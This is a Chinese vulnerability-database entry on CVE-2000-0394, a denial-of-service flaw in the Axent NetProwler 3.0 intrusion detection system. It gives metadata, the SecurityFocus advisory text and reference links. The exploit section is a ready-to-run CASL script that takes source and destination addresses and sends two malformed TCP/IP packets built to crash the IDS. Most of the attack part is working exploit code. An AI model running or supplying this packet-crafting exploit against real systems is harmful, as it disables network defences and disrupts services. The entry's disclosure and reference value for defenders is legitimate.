Axent NetProwler畸形IP包DoS漏洞

Axent NetProwler畸形IP包DoS漏洞

漏洞ID 1105844 漏洞类型 其他
发布时间 2000-05-18 更新时间 2005-05-02
图片[1]-Axent NetProwler畸形IP包DoS漏洞-安全小百科CVE编号 CVE-2000-0394
图片[2]-Axent NetProwler畸形IP包DoS漏洞-安全小百科CNNVD-ID CNNVD-200005-072
漏洞平台 Windows CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/19941
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200005-072
|漏洞详情
NetProwler3.0存在漏洞。远程攻击者通过传送触发NetProwler中Man-in-the-Middle签名的畸形IP包导致拒绝服务漏洞。
|漏洞EXP
source: http://www.securityfocus.com/bid/1225/info
 
Axent NetProwler 3.0 IDS is vulnerable to a malformed packet attack. It will crash if the Man-in-the-Middle signature encounters a packet for which the following expression is true:
(IP_HEADER_LENGTH + TCP_HEADER_LENGTH) > IP_TOTAL_LENGTH
 
According to Axent Security team, this is not a fragmented packet issue as reported in RFP2K05 By Rain Forest Puppy.
 
In addition, NetProwler utilizes Microsoft JET engine 3.5 for storing incoming alert information. More information regarding the Microsoft JET engine 3.5 vulnerability can be found at:
 
http://www.securityfocus.com/bid/286 

#include "tcpip.casl"
#include "packets.casl"

Src = pop args;
Dst = pop args;


Src = getip(Src);
Dst = getip(Dst);


iph = copy TCPIP;
iph.ip_version = 4;
iph.ip_headerlen = 5;
iph.ip_tos = 0;
iph.ip_length = 36;
iph.ip_id  = 2233;
iph.ip_offset = 3;
iph.ip_ttl = 62;
iph.ip_protocol = 6;
iph.ip_cksum = 38648;
iph.ip_source = Src;
iph.ip_destination = Dst;

tch = copy SYN;
tch.tcp_source = 1026;
tch.tcp_destination = 2058;
tch.tcp_seqno = 2542901;
tch.tcp_ackno = 0;
tch.tcp_offset = 0;
tch.tcp_x2 = 1;
tch.tcp_syn = 1;
tch.tcp_window = 768;

pk1data = "x 0x 0x 0x 0x 0x 0";


packet = [ iph, tch, pk1data ];

ip_output(packet);

iph2 = copy TCPIP;
iph2.ip_version = 4;
iph2.ip_headerlen = 5;
iph2.ip_tos = 0;
iph2.ip_length = 44;
iph2.ip_id = 2239;
iph2.ip_mf = 1;
iph2.ip_ttl = 62;
iph2.ip_protocol = 6;
iph2.ip_cksum = 30445;
iph2.ip_source = Src;
iph2.ip_destination = Dst;

tch2 = copy SYN;
tch2.tcp_source = 1032;
tch2.tcp_destination = 21;
tch2.tcp_seqno = 2816737352;
tch2.tcp_ackno = 0;
tch2.tcp_x2 = 10;
tch2.tcp_syn = 1;
tch2.tcp_window = 32120;
tch2.tcp_cksum = 29341;

pk2data = "x 2x 4x 5xb4 x 0x 0";

packet = [ iph2, tch2, pk2data ];

ip_output(packet);
|参考资料

来源:BUGTRAQ
名称:20000522RFP2K05-NetProwler”Fragmentation”Issue
链接:http://www.securityfocus.com/templates/archive.pike?list=1&msg;[email protected]
来源:BID
名称:1225
链接:http://www.securityfocus.com/bid/1225
来源:BUGTRAQ
名称:20000519RFP2K05:NetProwlervs.RFProwler
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=95878603510835&w;=2

相关推荐: Rosiello Security Sphiro HTTPd 0.1B – Remote Heap Buffer Overflow

Rosiello Security Sphiro HTTPd 0.1B – Remote Heap Buffer Overflow 漏洞ID 1054466 漏洞类型 发布时间 2004-04-30 更新时间 2004-04-30 CVE编号 N/A CNNV…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享